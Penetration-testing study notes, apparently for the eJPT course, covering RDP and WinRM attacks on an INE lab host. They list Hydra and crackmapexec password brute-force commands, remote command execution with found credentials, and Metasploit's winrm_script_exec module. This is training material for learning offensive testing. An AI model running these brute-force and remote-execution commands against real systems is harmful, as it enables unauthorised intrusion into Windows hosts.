Maercusxch/eJPT_Notes/4_Host & Network Penetration Testing/01_System & Host Based Attacks.md

 - `exploit` --> Detected RDP on 10.2.28.32:3333
 - `hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://demo.ine.local -s 3333` Running the Hydra tool to find a valid username and password from the provided list.
 - `xfreerdp /u:administrator /p:qwertyuiop /v:demo.ine.local:3333` We have discovered four valid users and passwords.
 Access the remote server using xfreerdp tool.

+### Exploiting WinRM

+Windows Remote Management (WinRM) is a Windows remote management protocol that can be used to facilitate remote access with Windows systems over HTTP(S).
+Microsoft implemented WinRM in to Windows in order to make life easier for system administrators.
+WinRM is typically used in the following ways: Remotely access and interact with Windows hosts on a local network.
+Remotely access and execute commands on Windows systems.
+Manage and configure Windows systems remotely.
+WinRM typically uses TCP port 5985 and 5986 (HTTPS).

+### Practical Exploiting WinRM

+- `nmap -sV demo.ine.local` The Default Ports that are configured for this scan is only the most common 1000.
+- `nmap -sV -p 5985 demo.ine.local`
+- `crackmapexec` Launches Crackmapexec
+- `crackmapexec winrm 10.2.16.39 -u administrator -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt)` Perform bruteforceattack only on the administrator account.
+- `crackmapexec winrm 10.2.16.39 -u administrator -p tinkerbell -x "whoami"` Use Crackmapexec to execute arbitrary commands and execute whoami on the windows server.
+- `crackmapexec winrm 10.2.16.39 -u administrator -p tinkerbell -x "systeminfo"`  Use Crackmapexec to execute arbitrary commands and execute systeminfo on the windows server.
+- `service postgresql start && msfconsole`
+- `use exploit/windows/winrm/winrm_script_exec`
+- `setg RHOSTS 10.2.16.39`
+- `set USERNAME administrator`
+- `set PASSWORD tinkerbell`
+- `set FORCE_VBS true` Force the module to use the VBS CmdStager
+- `getuid` puts the UID of the process out